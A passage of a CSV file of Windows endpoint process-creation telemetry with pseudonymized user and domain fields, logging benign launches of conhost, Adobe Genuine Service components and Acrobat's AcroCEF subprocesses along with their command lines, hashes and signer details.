+303,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:47.235287900+00:00,11048,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:53:47.229742100+00:00,7708,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_phqdsc 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:47.264845200+00:00,2021-06-23 00:54:55.395621+00:00,1278cc70-97a0-4a97-b881-50dc31f0805f,computerpii_0a470890c60768167990033d701e7bd881398861,155395,False,10.7740.19041.1052,False,11540474045171952,,11540474045171954,2021-06-23 00:53:47.229742100+00:00,7708,2021-06-23 00:53:47.229742100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,7708,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:46.229988300+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+304,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:47.451980500+00:00,6836,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a16776"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a16776""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,323272,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:47.515358400+00:00,2021-06-23 00:54:55.396139600+00:00,86e1a5da-7848-463f-95c8-ba45fcecc69c,computerpii_0a470890c60768167990033d701e7bd881398861,155402,False,10.7740.19041.1052,False,11540474045136991,,11540474045171956,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,2176,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility
+305,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:47.466305900+00:00,13624,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:53:47.451980500+00:00,6836,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a16776"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a16776""",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:47.516377500+00:00,2021-06-23 00:54:55.396265900+00:00,a7c3fb98-7cba-4cad-b599-241942ea2804,computerpii_0a470890c60768167990033d701e7bd881398861,155404,False,10.7740.19041.1052,False,11540474045171956,,11540474045171958,2021-06-23 00:53:47.451980500+00:00,6836,2021-06-23 00:53:47.451980500+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,6836,18560,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:47.468786+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+306,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:47.518000700+00:00,20016,AdobeGCClient.exe,"""AdobeGCClient.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a16776"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a16776""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AdobeGCClient.exe,6743752,99b696fe03a14bd322f39fc35827e487,b57aab0a87e6c85ddf061a0a10bc10b96c61ae827fbb61f514a1df9fffcf263f,43d2475f42eeacb434b632975a33ebc8979a95b3,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:53:47.451980500+00:00,6836,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a16776"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a16776""",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:47.600391300+00:00,2021-06-23 00:54:55.397120600+00:00,f7baa60f-547c-4cd0-b27d-85f34cb4dd2f,computerpii_0a470890c60768167990033d701e7bd881398861,155414,False,10.7740.19041.1052,False,11540474045171956,,11540474045171959,2021-06-23 00:53:47.451980500+00:00,6836,2021-06-23 00:53:47.451980500+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,6836,128,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:47.468786+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClient,AdobeGCClient.exe,Adobe GC Client Application
+307,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:49.101875800+00:00,17288,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:53:46.067997500+00:00,8868,Acrobat.exe,"""Acrobat.exe"" /l /act",False,2021-06-23 00:51:40.351037500+00:00,3584,AdobeCollabSync.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:49.171939800+00:00,2021-06-23 00:54:55.397629200+00:00,a00b5943-ef86-47c7-abbc-f29c8e099331,computerpii_0a470890c60768167990033d701e7bd881398861,155425,False,10.7740.19041.1052,False,11540474045171947,,11540474045171961,2021-06-23 00:53:46.067997500+00:00,8868,2021-06-23 00:53:46.067997500+00:00,Acrobat.exe,8868,256,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,3796704,2021-05-28 05:30:12+00:00,2021-05-28 05:58:58+00:00,2021-06-23 00:53:46.198745+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC ,,,,,,
+308,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:49.257111900+00:00,20052,AcroCEF.exe,"""AcroCEF.exe"" --type=renderer --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --touch-events=enabled --field-trial-handle=1884,12912412893251203934,87912324749864913,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-gpu-compositing --lang=en-US --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=15226209309742621589 --renderer-client-id=2 --mojo-platform-channel-handle=1896 --allow-no-sandbox-job /prefetch:1",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:53:49.101875800+00:00,17288,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-23 00:53:46.067997500+00:00,8868,Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:49.289509100+00:00,2021-06-23 00:54:55.398228+00:00,460131ec-9976-41bd-a7e5-ee89ed09030a,computerpii_0a470890c60768167990033d701e7bd881398861,155437,False,10.7740.19041.1052,False,11540474045171961,,11540474045171962,2021-06-23 00:53:49.101875800+00:00,17288,2021-06-23 00:53:49.101875800+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,17288,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-23 00:53:49.095230100+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+309,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:49.265955100+00:00,12396,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1884,12912412893251203934,87912324749864913,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=1881110401302000404 --mojo-platform-channel-handle=1908 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:53:49.101875800+00:00,17288,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-23 00:53:46.067997500+00:00,8868,Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:49.320356900+00:00,2021-06-23 00:54:55.398542800+00:00,66ecae6a-4f57-4b5a-bf45-c7371856af37,computerpii_0a470890c60768167990033d701e7bd881398861,155444,False,10.7740.19041.1052,False,11540474045171961,,11540474045171963,2021-06-23 00:53:49.101875800+00:00,17288,2021-06-23 00:53:49.101875800+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,17288,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-23 00:53:49.095230100+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+310,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:49.365430200+00:00,19064,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1884,12912412893251203934,87912324749864913,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=3236696501658250888 --mojo-platform-channel-handle=2224 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:53:49.101875800+00:00,17288,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-23 00:53:46.067997500+00:00,8868,Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:49.392263900+00:00,2021-06-23 00:54:55.398896400+00:00,d436240b-4580-4798-bf18-9addb660d135,computerpii_0a470890c60768167990033d701e7bd881398861,155452,False,10.7740.19041.1052,False,11540474045171961,,11540474045171964,2021-06-23 00:53:49.101875800+00:00,17288,2021-06-23 00:53:49.101875800+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,17288,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-23 00:53:49.095230100+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+311,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:49.437018700+00:00,10024,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1884,12912412893251203934,87912324749864913,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=2292834716156030982 --mojo-platform-channel-handle=2232 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:53:49.101875800+00:00,17288,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-23 00:53:46.067997500+00:00,8868,Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:49.466789+00:00,2021-06-23 